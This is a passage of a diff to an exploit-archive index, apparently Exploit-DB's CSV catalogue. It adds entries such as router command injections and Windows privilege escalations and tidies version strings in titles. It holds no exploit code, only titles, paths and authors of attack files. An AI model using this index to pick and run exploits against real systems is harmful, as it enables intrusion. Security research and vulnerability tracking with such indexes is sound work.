- Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -8557,7 +8564,7 @@ id,file,description,date,author,type,platform,port 25406,exploits/linux/local/25406.sh,"Kloxo 6.1.6 - Local Privilege Escalation",2013-05-13,HTP,local,linux, 25411,exploits/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",local,linux, 25419,exploits/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Local Buffer Overflow (SEH)",2013-05-13,seaofglass,local,windows, -25444,exploits/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1)",2013-05-14,sd,local,linux, +25444,exploits/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)",2013-05-14,sd,local,linux, 25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows, 25450,exploits/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation",2013-05-14,"Andrew Lutomirski",local,linux, 25554,exploits/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",local,windows, @@ -9691,6 +9698,8 @@ id,file,description,date,author,type,platform,port 44549,exploits/windows/local/44549.py,"Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)",2018-04-26,T3jv1l,local,windows, 44564,exploits/windows/local/44564.py,"LibreOffice/Open Office - '.odt' Information Disclosure",2018-05-02,"Richard Davy",local,windows, 44565,exploits/windows/local/44565.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)",2018-05-02,"Marwan Shamel",local,windows, +44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows, +44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16148,7 +16157,7 @@ id,file,description,date,author,type,platform,port 41592,exploits/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,remote,windows, 41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80 41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800 -41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080 +41614,exploits/multiple/remote/41614.rb,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080 43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android, 43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php, 43360,exploits/linux/remote/43360.py,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80 @@ -16437,6 +16446,7 @@ id,file,description,date,author,type,platform,port 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows, 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware, +44412,exploits/multiple/remote/44412.py,"Adobe Flash < 28.0.0.161 - Use-After-Free",2018-04-06,SyFi,remote,multiple, 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android, 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware, 44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows, @@ -16454,6 +16464,10 @@ id,file,description,date,author,type,platform,port 44569,exploits/ruby/remote/44569.rb,"Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554 44570,exploits/ruby/remote/44570.rb,"Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554 44571,exploits/linux/remote/44571.py,"Exim < 4.90.1 - 'base64d' Remote Code Execution",2018-05-02,straight_blast,remote,linux,25 +44574,exploits/hardware/remote/44574.txt,"Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC)",2018-05-02,embedi,remote,hardware, +44576,exploits/hardware/remote/44576.sh,"GPON Routers - Authentication Bypass / Command Injection",2018-05-03,vpnmentor,remote,hardware, +44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware, +44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -18514,7 +18528,7 @@ id,file,description,date,author,type,platform,port 4284,exploits/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php?cat' SQL Injection",2007-08-13,t0pP8uZz,webapps,php, 4286,exploits/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Authentication Bypass / SQL Injection",2007-08-14,s4squatch,webapps,cgi, 4291,exploits/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php?query' SQL Injection",2007-08-16,RoXur777,webapps,php, -4295,exploits/php/webapps/4295.txt,"Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,webapps,php, +4295,exploits/php/webapps/4295.txt,"Squirrelcart 1.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,webapps,php, 4296,exploits/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,webapps,php, 4300,exploits/php/webapps/4300.txt,"litecommerce 2004 - 'category_id' SQL Injection",2007-08-21,k1tk4t,webapps,php, 4305,exploits/php/webapps/4305.txt,"Joomla! Component NeoRecruit 1.4 - 'id' SQL Injection",2007-08-23,ajann,webapps,php, @@ -22131,7 +22145,7 @@ id,file,description,date,author,type,platform,port 9459,exploits/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,webapps,php, 9460,exploits/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,webapps,php, 9461,exploits/php/webapps/9461.txt,"E CMS 1.0 - 'index.php?s' SQL Injection",2009-08-18,Red-D3v1L,webapps,php, -9462,exploits/php/webapps/9462.txt,"Infinity 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,webapps,php, +9462,exploits/php/webapps/9462.txt,"Infinity 2.x - 'options[style_dir]' Local File Disclosure",2009-08-18,SwEET-DeViL,webapps,php, 9463,exploits/php/webapps/9463.php,"Joomla! Component MisterEstate - Blind SQL Injection",2009-08-18,jdc,webapps,php, 9464,exploits/php/webapps/9464.txt,"Fotoshow PRO - 'category' SQL Injection",2009-08-18,darkmasking,webapps,php, 9465,exploits/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,webapps,php, @@ -24463,7 +24477,7 @@ id,file,description,date,author,type,platform,port 14578,exploits/php/webapps/14578.php,"PHPKick 0.8 - 'Statistics.php' SQL Injection",2010-08-08,garwga,webapps,php, 14585,exploits/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,webapps,php, 14598,exploits/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injections",2010-08-10,"Salvatore Fresta",webapps,php, -14589,exploits/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,webapps,php, +14589,exploits/php/webapps/14589.txt,"PHP-Nuke 8.x - Blind SQL Injection",2010-08-09,ITSecTeam,webapps,php, 14592,exploits/php/webapps/14592.txt,"Joomla! Component com_yellowpages - SQL Injection",2010-08-09,"al bayraqim",webapps,php, 14595,exploits/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,webapps,php, 14596,exploits/php/webapps/14596.txt,"Joomla! Component Amblog 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",webapps,php, @@ -25688,7 +25702,7 @@ id,file,description,date,author,type,platform,port 17995,exploits/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,webapps,php, 17997,exploits/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",webapps,php, 17998,exploits/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",webapps,php, -17999,exploits/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure",2011-10-19,"Lagripe-Dz & Mca-Crb",webapps,php, +17999,exploits/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure",2011-10-19,"Lagripe-Dz & Mca-Crb",webapps,php, 18000,exploits/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta - 'force_download.php' Local File Inclusion",2011-10-19,"Sangyun YOO",webapps,php, 18001,exploits/php/webapps/18001.txt,"CMS mini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,webapps,php, 18002,exploits/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",webapps,php, @@ -25727,7 +25741,7 @@ id,file,description,date,author,type,platform,port 18075,exploits/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,webapps,php, 18076,exploits/php/webapps/18076.txt,"Advanced Poll 2.02 - SQL Injection",2011-11-04,"Yassin Aboukir",webapps,php, 18077,exploits/windows/webapps/18077.txt,"HP Data Protector Media Operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",webapps,windows, -18081,exploits/php/webapps/18081.txt,"WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure",2011-11-04,"red virus",webapps,php, +18081,exploits/php/webapps/18081.txt,"WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure",2011-11-04,"red virus",webapps,php, 18083,exploits/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php, 18084,exploits/php/webapps/18084.php,"PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php, 18085,exploits/php/webapps/18085.php,"aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php, @@ -28136,7 +28150,7 @@ id,file,description,date,author,type,platform,port 25403,exploits/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - 'Album_Cat.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php, 25404,exploits/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - 'Album_Comment.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php, 25405,exploits/php/webapps/25405.txt,"Getsimple CMS 3.2.1 - Arbitrary File Upload",2013-05-13,"Ahmed Elhady Mohamed",webapps,php, -25409,exploits/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php, +25409,exploits/php/webapps/25409.txt,"Ajax Availability Calendar 3.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php, 25410,exploits/php/webapps/25410.txt,"Joomla! Component com_s5clanroster - 'id' SQL Injection",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php, 25412,exploits/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,ios, 25413,exploits/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1/1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,hardware, @@ -35257,13 +35271,13 @@ id,file,description,date,author,type,platform,port 36228,exploits/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",webapps,php, 36230,exploits/php/webapps/36230.txt,"WordPress Plugin Calculated Fields Form 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",webapps,php, 36231,exploits/php/webapps/36231.py,"GoAutoDial CE 2.0 - Arbitrary File Upload",2015-02-28,R-73eN,webapps,php, -36232,exploits/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,webapps,php,80 +36232,exploits/php/webapps/36232.txt,"vBulletin vBSEO 4.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,webapps,php,80 36233,exploits/php/webapps/36233.txt,"WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",webapps,php, 36236,exploits/php/webapps/36236.txt,"Xenon - 'id' Multiple SQL Injections",2011-10-14,m3rciL3Ss,webapps,php, 36237,exploits/php/webapps/36237.txt,"asgbookPHP 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,webapps,php, 36240,exploits/php/webapps/36240.txt,"Site@School 2.4.10 - '/index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",webapps,php, 36241,exploits/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",webapps,hardware, -36242,exploits/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,webapps,php, +36242,exploits/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,webapps,php, 36243,exploits/php/webapps/36243.txt,"WordPress Plugin cp-multi-view-calendar 1.1.4 - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",webapps,php, 36248,exploits/php/webapps/36248.txt,"osCommerce - Arbitrary File Upload / File Disclosure",2011-10-20,indoushka,webapps,php, 36249,exploits/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",webapps,php, @@ -36643,7 +36657,7 @@ id,file,description,date,author,type,platform,port 38520,exploits/php/webapps/38520.html,"WordPress Plugin WP Cleanfix - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",webapps,php, 38523,exploits/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injections",2013-05-23,XroGuE,webapps,php, 38524,exploits/php/webapps/38524.pl,"Matterdaddy Market - Multiple Vulnerabilities",2013-05-24,KedAns-Dz,webapps,php, -38525,exploits/php/webapps/38525.txt,"Subrion 3.X.x - Multiple Vulnerabilities",2015-10-23,bRpsd,webapps,php, +38525,exploits/php/webapps/38525.txt,"Subrion 3.x - Multiple Vulnerabilities",2015-10-23,bRpsd,webapps,php, 38527,exploits/php/webapps/38527.txt,"Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",webapps,php, 38528,exploits/php/webapps/38528.txt,"Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",webapps,php, 38572,exploits/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,webapps,php, @@ -39094,6 +39108,7 @@ id,file,description,date,author,type,platform,port 43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592 43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi, 43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80 +43347,exploits/php/webapps/43347.txt,"Ciuis CRM 1.0.7 - SQL Injection",2017-12-18,"Zahid Abbasi",webapps,php, 43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php, 43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php, 44158,exploits/php/webapps/44158.txt,"Joomla! Component CW Tags 2.0.6 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, @@ -39173,6 +39188,7 @@ id,file,description,date,author,type,platform,port 44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl, 44387,exploits/hardware/webapps/44387.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials",2018-04-02,LiquidWorm,webapps,hardware, 44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware, +44390,exploits/windows/webapps/44390.py,"LifeSize ClearSea 3.1.4 - Directory Traversal",2018-04-02,rsp3ar,webapps,windows, 44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php, 44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php, 44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware, @@ -39184,6 +39200,7 @@ id,file,description,date,author,type,platform,port 44406,exploits/php/webapps/44406.txt,"Z-Blog 1.5.1.1740 - Cross-Site Scripting",2018-04-05,zzw,webapps,php, 44407,exploits/php/webapps/44407.txt,"Z-Blog 1.5.1.1740 - Full Path Disclosure",2018-04-05,zzw,webapps,php, 44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php, +44409,exploits/php/webapps/44409.txt,"WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting",2018-04-05,"Stefan Broeder",webapps,php, 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware, 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows, 44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php, @@ -39257,3 +39274,5 @@ id,file,description,date,author,type,platform,port 44560,exploits/php/webapps/44560.py,"Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root",2018-04-30,"Jared Arave",webapps,php, 44563,exploits/php/webapps/44563.txt,"WordPress Plugin Responsive Cookie Consent 1.7 / 1.6 / 1.5 - Authenticated Persistent Cross-Site Scripting",2018-05-01,B0UG,webapps,php, 44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80 +44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware, +44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,